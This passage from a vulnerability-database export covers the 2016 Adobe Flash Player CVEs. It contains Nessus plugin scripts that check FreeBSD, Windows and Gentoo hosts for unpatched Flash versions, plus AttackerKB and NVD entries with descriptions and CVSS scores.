script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n\n script_name(english:\"FreeBSD : flash -- multiple vulnerabilities (5d8e56c3-9e67-4d5b-81c9-3a409dfd705f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2016-0985).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\nCVE-2016-0982, CVE-2016-0983, CVE-2016-0984).\n\nThese updates resolve a heap buffer overflow vulnerability that could\nlead to code execution (CVE-2016-0971).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\nCVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970,\nCVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\nCVE-2016-0979, CVE-2016-0980, CVE-2016-0981).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\"\n );\n # https://vuxml.freebsd.org/freebsd/5d8e56c3-9e67-4d5b-81c9-3a409dfd705f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bd9b994c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.569\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.569\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6_64-flashplugin<11.2r202.569\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:15:13", "description": "The remote Windows host 
is missing KB3135782. It is, therefore,\naffected by multiple vulnerabilities :\n \n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 33, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "MS16-022: Security Update for Adobe Flash Player (3135782)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS16-022.NASL", "href": "https://www.tenable.com/plugins/nessus/88654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88654);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/19\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n 
\"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n script_xref(name:\"MSFT\", value:\"MS16-022\");\n script_xref(name:\"MSKB\", value:\"3135782\");\n\n script_name(english:\"MS16-022: Security Update for Adobe Flash Player (3135782)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3135782. It is, therefore,\naffected by multiple vulnerabilities :\n \n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. 
(CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2012, 8.1, RT 8.1,\n2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0984\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-022';\nkbs = make_list(\"3135782\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all < 18.0.0.329 or 19 < 20.0.0.306\nfix = FALSE;\nif(iver =~ \"^(19|20)\\.\" && ver_compare(ver:iver, fix:\"20.0.0.306\", strict:FALSE) < 0)\n fix = \"20.0.0.306\";\nelse if(ver_compare(ver:iver, fix:\"18.0.0.329\", strict:FALSE) < 0)\n fix = \"18.0.0.329\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n 
fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS16-022', kb:'3135782', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:04:56", "description": "The remote host is affected by the vulnerability described in GLSA-201603-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-14T00:00:00", "title": "GLSA-201603-07 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0993", "CVE-2016-0992", "CVE-2016-1000", "CVE-2016-0996", "CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0987", "CVE-2016-0997", "CVE-2016-0963", "CVE-2016-0962", "CVE-2016-1002", "CVE-2016-0994", 
"CVE-2016-0998", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0990", "CVE-2016-0969", "CVE-2016-0999", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0960", "CVE-2016-0986", "CVE-2016-0966", "CVE-2016-1001", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0995", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-1005", "CVE-2016-0988", "CVE-2016-0977", "CVE-2016-0961", "CVE-2016-1010", "CVE-2016-0989", "CVE-2016-0985", "CVE-2016-0991"], "modified": "2016-03-14T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-201603-07.NASL", "href": "https://www.tenable.com/plugins/nessus/89900", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201603-07.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89900);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0960\", \"CVE-2016-0961\", \"CVE-2016-0962\", \"CVE-2016-0963\", \"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\", \"CVE-2016-0986\", \"CVE-2016-0987\", \"CVE-2016-0988\", \"CVE-2016-0989\", \"CVE-2016-0990\", \"CVE-2016-0991\", \"CVE-2016-0992\", \"CVE-2016-0993\", \"CVE-2016-0994\", \"CVE-2016-0995\", \"CVE-2016-0996\", \"CVE-2016-0997\", \"CVE-2016-0998\", \"CVE-2016-0999\", \"CVE-2016-1000\", \"CVE-2016-1001\", \"CVE-2016-1002\", \"CVE-2016-1005\", \"CVE-2016-1010\");\n script_xref(name:\"GLSA\", value:\"201603-07\");\n\n script_name(english:\"GLSA-201603-07 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201603-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n 
sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201603-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose 'www-plugins/adobe-flash-11.2.202.577'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.577\"), vulnerable:make_list(\"lt 11.2.202.577\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2020-11-22T06:09:27", "bulletinFamily": "info", "cvelist": ["CVE-2016-0973", "CVE-2016-0974", "CVE-2016-0975", "CVE-2016-0982", "CVE-2016-0983", "CVE-2016-0984"], "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0973, CVE-2016-0974, CVE-2016-0975, CVE-2016-0982, and CVE-2016-0983.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:13am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at 
<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-02-10T00:00:00", "id": "AKB:EE2653E1-CBE1-4AF3-A198-B66C88A65136", "href": "https://attackerkb.com/topics/HN4pBHqbvW/cve-2016-0984", "type": "attackerkb", "title": "CVE-2016-0984", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0969", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0969"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0969", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a 
denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0970", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0970"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0970", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0970", "cvss": {"score": 10.0, 
